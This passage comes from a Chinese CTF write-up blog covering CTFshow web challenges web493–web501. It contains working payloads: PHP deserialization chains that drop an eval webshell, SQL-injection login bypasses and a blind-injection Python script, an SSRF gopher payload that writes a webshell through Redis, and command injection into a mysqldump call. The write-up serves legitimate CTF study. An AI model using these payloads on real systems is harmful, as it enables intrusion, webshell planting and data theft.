invoke__">date_format</span>(<span class="title function_ invoke__">date_create</span>(),<span class="string">&quot;Y-m-d-H-i-s&quot;</span>).<span class="string">&#x27; &#x27;</span>.<span class="variable">$sql</span>.<span class="string">&#x27; \r\n&#x27;</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">		<span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$this</span>-&gt;log, <span class="variable">$this</span>-&gt;content,FILE_APPEND);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>构建反序列化payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">db</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$log</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$sql</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;log=<span class="keyword">new</span> <span class="title function_ invoke__">dbLog</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">dbLog</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$sql</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$content</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$log</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;log=<span class="string">&#x27;log/3.php&#x27;</span>;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;content =<span class="string">&#x27;&lt;?php eval($_POST[1]);?&gt;&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title function_ invoke__">db</span>();</span><br><span class="line"><span class="variable">$b</span> = <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>));</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$b</span>;</span><br></pre></td></tr></table></figure>

<p>得到结果为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O%3A2%3A%22db%22%3A2%3A%7Bs%3A3%3A%22log%22%3BO%3A5%3A%22dbLog%22%3A3%3A%7Bs%3A3%3A%22sql%22%3BN%3Bs%3A7%3A%22content%22%3Bs%3A24%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3B%3F%3E%22%3Bs%3A3%3A%22log%22%3Bs%3A9%3A%22log%2F3.php%22%3B%7Ds%3A3%3A%22sql%22%3BN%3B%7D</span><br></pre></td></tr></table></figure>

<p>然后cookie写入payload，记得要满足<code>if(!isset($action))</code>，把action参数删去就可以</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919121223772.png"></p>
<p>然后蚁剑连接</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919121337295.png"></p>
<h3 id="web494"><a href="#web494" class="headerlink" title="web494"></a>web494</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919134125792.png"></p>
<p>一开始看到<code>templateUtil::render(&#39;index&#39;,$user)</code>，我以为可以继续用之前的方法，但是后面连接webshell怎么都连不上，读取<code>/render/cache_class.php</code>代码之后发现php后缀改成html后缀了，那没办法了</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919134412853.png"></p>
<p>反序列化那里加了<code>if(preg_match(&#39;/\:|\,/&#39;, $c))&#123;</code>来过滤，不过不影响，继续用上题的反序列化方法</p>
<p>payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">db</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$log</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$sql</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;log=<span class="keyword">new</span> <span class="title function_ invoke__">dbLog</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">dbLog</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$sql</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$content</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$log</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;log=<span class="string">&#x27;log/3.php&#x27;</span>;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;content =<span class="string">&#x27;&lt;?php eval($_POST[1]);?&gt;&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title function_ invoke__">db</span>();</span><br><span class="line"><span class="variable">$b</span> = <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>));</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$b</span>;</span><br></pre></td></tr></table></figure>

<p>结果</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O%3A2%3A%22db%22%3A2%3A%7Bs%3A3%3A%22log%22%3BO%3A5%3A%22dbLog%22%3A3%3A%7Bs%3A3%3A%22sql%22%3BN%3Bs%3A7%3A%22content%22%3Bs%3A24%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3B%3F%3E%22%3Bs%3A3%3A%22log%22%3Bs%3A9%3A%22log%2F3.php%22%3B%7Ds%3A3%3A%22sql%22%3BN%3B%7D</span><br></pre></td></tr></table></figure>

<p>然后cookie传入，蚁剑连接webshell，找了一会找不到flag，那连接数据库看看，先读取<code>/render/db_class.php</code>查看数据库配置信息</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919135354414.png"></p>
<p>然后蚁剑连接</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919135423947.png"></p>
<p>读取flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919135511152.png"></p>
<h3 id="web495"><a href="#web495" class="headerlink" title="web495"></a>web495</h3><p>核心代码没有变</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$action</span>))&#123;</span><br><span class="line">	<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_COOKIE</span>[<span class="string">&#x27;user&#x27;</span>]))&#123;</span><br><span class="line">		<span class="variable">$c</span>=<span class="variable">$_COOKIE</span>[<span class="string">&#x27;user&#x27;</span>];</span><br><span class="line">		<span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/\:|\,/&#x27;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">			<span class="variable">$user</span>=<span class="title function_ invoke__">unserialize</span>(<span class="variable">$c</span>);</span><br><span class="line">		&#125;</span><br></pre></td></tr></table></figure>

<p>可以继续用上题的方法，flag在数据库</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919140210540.png"></p>
<h3 id="web496"><a href="#web496" class="headerlink" title="web496"></a>web496</h3><p>查看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919160055184.png"></p>
<p>发现反序列化代码被注释了，然后SQL正则那里多了一些过滤，可以用万能密码登录系统</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">账号：&#x27;||1=1#</span><br><span class="line">密码：1</span><br></pre></td></tr></table></figure>

<p>进去后点击基本资料，可以看到管理员信息修改</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919160313802.png"></p>
<p>查看网页源码，发现是通过POST发送请求到<code>api/admin_edit.php</code></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919160417338.png"></p>
<p>我们查看<code>api/admin_edit.php</code>的源码，GET请求<code>/index.php?action=../api/admin_edit</code></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919160602365.png"></p>
<p>可以看到有个update语句，然后下面有修改成功和失败的文本信息。那我们的思路就是写个脚本，先用万能密码登录保持登录状态，然后在<code>user[username]</code>数组里写payload进行布尔盲注，同时要保证<code>nickname</code>不重复</p>
<p>payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://eb072399-7e45-41c9-a2dd-d30c29f993ee.challenge.ctf.show&quot;</span></span><br><span class="line">chars = <span class="string">&quot;qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890[]&#123;&#125;,.-_&quot;</span></span><br><span class="line">result = <span class="string">&quot;&quot;</span></span><br><span class="line">session = requests.session()</span><br><span class="line">session.post(url + <span class="string">&quot;?action=check&quot;</span>, data=&#123;<span class="string">&quot;username&quot;</span>:<span class="string">&quot;&#x27;||1=1#&quot;</span>, <span class="string">&quot;password&quot;</span>:<span class="number">1</span>&#125;)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> pos <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">100</span>):</span><br><span class="line">    found = <span class="literal">False</span></span><br><span class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> chars:</span><br><span class="line">        <span class="comment">#payload = &quot;&#x27;||if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),&#123;0&#125;,1)=&#x27;&#123;1&#125;&#x27;,1,0)#&quot;.format(pos, c)</span></span><br><span class="line">        <span class="comment">#payload = &quot;&#x27;||if(substr((select group_concat(column_name) from information_schema.columns where table_name=&#x27;flagyoudontknow76&#x27;),&#123;0&#125;,1)=&#x27;&#123;1&#125;&#x27;,1,0)#&quot;.format(pos, c)</span></span><br><span class="line">        payload = <span class="string">&quot;&#x27;||if(substr((select flagisherebutyouneverknow118 from flagyoudontknow76),&#123;0&#125;,1)=&#x27;&#123;1&#125;&#x27;,1,0)#&quot;</span>.<span class="built_in">format</span>(pos, c)</span><br><span class="line">        data = &#123;<span class="string">&#x27;nickname&#x27;</span>: <span class="built_in">str</span>(pos), <span class="string">&#x27;user[username]&#x27;</span>: payload&#125;</span><br><span class="line">        response = session.post(url + <span class="string">&quot;/api/admin_edit.php&quot;</span>, data=data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;u529f&quot;</span> <span class="keyword">in</span> response.text:</span><br><span class="line">            result += c</span><br><span class="line">            <span class="built_in">print</span>(result)</span><br><span class="line">            found = <span class="literal">True</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> found:</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>运行脚本得到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919161845973.png"></p>
<h3 id="web497"><a href="#web497" class="headerlink" title="web497"></a>web497</h3><p>查看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919162859971.png"></p>
<p><code>$user=unserialize($c)</code>的注释去掉了，但是前面的正则匹配加了感叹号，也就是不能出现冒号和逗号，那我们不走这个方法，继续用万能密码登录系统，账号<code>&#39;||1=1#</code>，密码1</p>
<p>然后点击基本信息，发现头像处可以修改</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919163257641.png"></p>
<p>直接file协议读取flag文件，存在SSRF漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file:///flag</span><br></pre></td></tr></table></figure>

<p>修改成功后右键点击头像，选择在新标签页中打开图像，成功读到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919163616708.png"></p>
<h3 id="web498"><a href="#web498" class="headerlink" title="web498"></a>web498</h3><p>也是上一题的方法，读<code>/etc/passwd</code>可以，但是读flag读不到了，可能是权限不足，也可能是flag不叫这个名字了或者在其他目录</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919164623045.png"></p>
<p>刚好看到<code>/etc/passwd</code>里面有个<code>redis</code>，输入<code>dict://127.0.0.1:6379</code>探测端口开放情况</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919165013133.png"></p>
<p>用Gopher协议打SSRF就可以，工具Gopherus</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919165755580.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2428%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5B1%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A</span><br></pre></td></tr></table></figure>

<p>然后访问<code>/shell.php</code>，查看根目录</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919170108628.png"></p>
<p>读取flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919170150512.png"></p>
<h3 id="web499"><a href="#web499" class="headerlink" title="web499"></a>web499</h3><p>头像地址没了，SSRF打不通</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919171305287.png"></p>
<p>随便点了一下，发现系统配置可以打开</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919171403711.png"></p>
<p>查看源代码，发现有个<code>api/admin_settings.php</code>路径</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919171548037.png"></p>
<p>查看<code>api/admin_settings.php</code>源码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919171632228.png"></p>
<p>关键代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$user</span>)&#123;</span><br><span class="line">	<span class="variable">$config</span> = <span class="title function_ invoke__">unserialize</span>(<span class="title function_ invoke__">file_get_contents</span>(<span class="keyword">__DIR__</span>.<span class="string">&#x27;/../config/settings.php&#x27;</span>));</span><br><span class="line">	<span class="keyword">foreach</span> (<span class="variable">$_POST</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>) &#123;</span><br><span class="line">		<span class="variable">$config</span>[<span class="variable">$key</span>]=<span class="variable">$value</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="title function_ invoke__">file_put_contents</span>(<span class="keyword">__DIR__</span>.<span class="string">&#x27;/../config/settings.php&#x27;</span>, <span class="title function_ invoke__">serialize</span>(<span class="variable">$config</span>));</span><br></pre></td></tr></table></figure>

<p>它会把POST传进来的键值对放入数组，然后写入文件<code>config/settings.php</code>，我们看看<code>config/settings.php</code>源码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919172158824.png"></p>
<p>刚好对应的就是前面的系统配置页面，那我们在系统配置页面传入一句话木马</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919172300775.png"></p>
<p>可以看到木马已经成功写入</p>
<p><img src="https://oss.waynejoons.icu/picphoto/image-20250919172337292.png"></p>
<p>蚁剑连接</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919172431100.png"></p>
<p>在根目录找到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919172511649.png"></p>
<h3 id="web500"><a href="#web500" class="headerlink" title="web500"></a>web500</h3><p>上题的代码改了，不是写到php文件了，那我们换个方法</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919173105728.png"></p>
<p>回到管理页面点了一通，发现数据库备份可以打开</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919173204845.png"></p>
<p>查看源码，发现其POST请求发送到<code>api/admin_db_backup.php</code>，那我们读取源码看看</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919173335345.png"></p>
<p>关键代码<code>shell_exec(&#39;mysqldump -u root -h 127.0.0.1 -proot --databases ctfshow &gt; &#39;.__DIR__.&#39;/../backup/&#39;.$db_path)</code>，那我们可以拼接命令读取flag</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;cat /f*&gt;/var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250919173936696.png"></p>
<p>然后访问<code>1.txt</code>读取flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919174019841.png"></p>
<h3 id="web501"><a href="#web501" class="headerlink" title="web501"></a>web501</h3><p>这次修改名称的地方不见了</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919175239848.png"></p>
<p>查看代码，发现其多了个正则匹配</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919175314191.png"></p>
<p>因为前面有个<code>extract($_POST)</code>，然后数据库备份的源码写了POST请求的目标地址</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919175556653.png"></p>
<p>那我们可以直接向目标地址发送POST请求执行命令</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919175624300.png"></p>
<p>然后访问<code>/1.txt</code>读取flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250919175658035.png"></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>CTFSHOW 中期测评（一）web486 - web501</p><p><a href="https://waynejoon.github.io/posts/ctfshow-mid-term-assessment-web486-web501/">https://waynejoon.github.io/posts/ctfshow-mid-term-assessment-web486-web501/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>WayneJoon.H</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2025-09-19</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="level is-mobile is-flex"><div class="article-tags is-size-7 is-uppercase"><i class="fas fa-tags has-text-grey"></i> <a class="link-muted" rel="tag" href="/tags/CTFSHOW/">CTFSHOW, </a><a class="link-muted" rel="tag" href="/tags/CTF%E7%BB%83%E4%B9%A0/">CTF练习 </a></div></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/posts/ctfshow-mid-term-assessment-2-web502-web516/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">CTFSHOW 中期测评（二）web502 - web516</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/posts/ctf-2025changcheng-web-wp/"><span class="level-item">2025第五届长城杯网络安全大赛初赛 Web方向 WP</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="/img/waynejoon.jpg" alt="WayneJoon.H"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">WayneJoon.H</p><p class="is-size-6 is-block">记录学习生活</p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives/"><p class="title">28</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories/"><p class="title">6</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags/"><p class="title">9</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/waynejoon" target="_blank" rel="me noopener">关注我</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Github" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#题目列表"><span class="level-left"><span class="level-item">1</span><span class="level-item">题目列表</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#web486"><span class="level-left"><span class="level-item">1.1</span><span class="level-item">web486</span></span></a></li><li><a class="level is-mobile" href="#web487"><span class="level-left"><span class="level-item">1.2</span><span class="level-item">web487</span></span></a></li><li><a class="level is-mobile" href="#web488"><span class="level-left"><span class="level-item">1.3</span><span class="level-item">web488</span></span></a></li><li><a class="level is-mobile" href="#web489"><span class="level-left"><span class="level-item">1.4</span><span class="level-item">web489</span></span></a></li><li><a class="level is-mobile" href="#web490"><span class="level-left"><span class="level-item">1.5</span><span class="level-item">web490</span></span></a></li><li><a class="level is-mobile" href="#web491"><span class="level-left"><span class="level-item">1.6</span><span class="level-item">web491</span></span></a></li><li><a class="level is-mobile" href="#web492"><span class="level-left"><span class="level-item">1.7</span><span class="level-item">web492</span></span></a></li><li><a class="level is-mobile" href="#web493"><span class="level-left"><span class="level-item">1.8</span><span class="level-item">web493</span></span></a></li><li><a class="level is-mobile" href="#web494"><span class="level-left"><span class="level-item">1.9</span><span class="level-item">web494</span></span></a></li><li><a class="level is-mobile" href="#web495"><span class="level-left"><span class="level-item">1.10</span><span class="level-item">web495</span></span></a></li><li><a class="level is-mobile" href="#web496"><span class="level-left"><span class="level-item">1.11</span><span class="level-item">web496</span></span></a></li><li><a class="level is-mobile" href="#web497"><span class="level-left"><span class="level-item">1.12</span><span class="level-item">web497</span></span></a></li><li><a class="level is-mobile" href="#web498"><span class="level-left"><span class="level-item">1.13</span><span class="level-item">web498</span></span></a></li><li><a class="level is-mobile" href="#web499"><span class="level-left"><span class="level-item">1.14</span><span class="level-item">web499</span></span></a></li><li><a class="level is-mobile" href="#web500"><span class="level-left"><span class="level-item">1.15</span><span class="level-item">web500</span></span></a></li><li><a class="level is-mobile" href="#web501"><span class="level-left"><span class="level-item">1.16</span><span class="level-item">web501</span></span></a></li></ul></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/">WayneJH</a><p class="is-size-7"><span>&copy; 2025 WayneJoon.H</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script data-pjax src="/js/busuanzi-fix.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.min.js"></script><script src="/js/pjax.js"></script><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script data-pjax src="/js/insight.js" defer></script><script data-pjax>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>